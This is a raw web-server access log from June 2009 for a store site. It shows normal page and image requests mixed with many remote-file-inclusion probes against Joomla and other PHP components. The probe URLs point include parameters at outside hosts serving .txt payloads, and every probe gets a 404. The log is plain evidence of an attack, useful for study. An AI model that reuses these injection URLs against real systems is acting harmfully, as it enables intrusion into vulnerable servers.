69.94.80.27 - - [24/Jun/2009:05:24:59 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:59 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:59 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:59 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:59 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:03 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:03 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:03 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:03 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:04 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:04 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:05 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:06 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:06 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:06 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:06 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:07 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:07 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:07 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:09 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:09 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
85.181.181.238 - - [24/Jun/2009:05:25:41 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76246 "http://www.acesurgical.com/collagen_ftp.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:43 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:44 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:44 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:44 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:44 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:44 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:44 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:45 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:45 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:45 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:45 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:46 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:46 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:46 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:46 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:46 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:47 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:47 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:47 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:47 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:47 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:48 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:48 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:48 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:48 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:49 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:49 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:25:49 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
69.94.80.27 - - [24/Jun/2009:05:25:54 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:55 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:55 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.181.181.238 - - [24/Jun/2009:05:25:55 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
69.94.80.27 - - [24/Jun/2009:05:25:57 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:58 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:58 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:25:59 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:26:00 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.181.181.238 - - [24/Jun/2009:05:26:05 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L015101471C53B400B5B0072+M37+ENG HTTP/1.1" 200 53467 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:26:07 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L015101471C53B400B5B0072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:26:07 -0400] "GET /images/items/CONFORM_THUMB.JPG HTTP/1.1" 200 1623 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L015101471C53B400B5B0072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
85.181.181.238 - - [24/Jun/2009:05:26:07 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L015101471C53B400B5B0072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
66.249.71.49 - - [24/Jun/2009:05:26:16 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905D4801F369004B3006E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.254.216.47 - - [24/Jun/2009:05:26:22 -0400] "GET /send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
65.254.216.47 - - [24/Jun/2009:05:26:22 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.254.216.47 - - [24/Jun/2009:05:26:22 -0400] "GET /logs/send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
65.254.216.47 - - [24/Jun/2009:05:26:27 -0400] "GET /logs/access_log.Q109060600%20%20/send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.254.216.47 - - [24/Jun/2009:05:26:27 -0400] "GET /send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
65.254.216.47 - - [24/Jun/2009:05:26:27 -0400] "GET /logs/send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:26:37 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:26:37 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:26:37 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.254.216.47 - - [24/Jun/2009:05:26:38 -0400] "GET /logs/send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
65.254.216.47 - - [24/Jun/2009:05:26:38 -0400] "GET /send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
65.254.216.47 - - [24/Jun/2009:05:26:38 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
38.99.44.103 - - [24/Jun/2009:05:26:58 -0400] "GET /images/_notes/nav_store_cart_off_r1_c2.jpg.mno HTTP/1.0" 200 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.254.216.47 - - [24/Jun/2009:05:27:10 -0400] "GET /logs/access_log.Q109061200/send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:27:13 -0400] "GET /rfie404.php?DOCUMENT_ROOT=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:27:13 -0400] "GET /logs/rfie404.php?DOCUMENT_ROOT=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:27:13 -0400] "GET /logs/access_log.Q109050800/rfie404.php?DOCUMENT_ROOT=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.79.164.109 - - [24/Jun/2009:05:27:31 -0400] "GET /logs/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 277 "-" "libwww-perl/5.812"
66.79.164.109 - - [24/Jun/2009:05:27:32 -0400] "GET /logs/access_log.Q109060300/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 299 "-" "libwww-perl/5.812"
66.79.164.109 - - [24/Jun/2009:05:27:32 -0400] "GET /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 272 "-" "libwww-perl/5.812"
65.254.216.47 - - [24/Jun/2009:05:27:32 -0400] "GET /logs/error_log.Q108072200%20%20/send_reminders.php?includedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:05:28:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.172.33.230 - - [24/Jun/2009:05:28:39 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:28:39 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:28:39 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:28:45 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:28:45 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:28:45 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:28:53 -0400] "GET /logs/access_log.Q109051300/rfie404.php?DOCUMENT_ROOT=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:28:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L019060400933D900DF6006G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.234.108.246 - - [24/Jun/2009:05:28:59 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:28:59 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:28:59 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.206.120.187 - - [24/Jun/2009:05:29:00 -0400] "GET /logs//board/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.206.120.187 - - [24/Jun/2009:05:29:00 -0400] "GET /logs/access_log.Q109051900//board/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.206.120.187 - - [24/Jun/2009:05:29:00 -0400] "GET //board/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:29:00 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:29:07 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
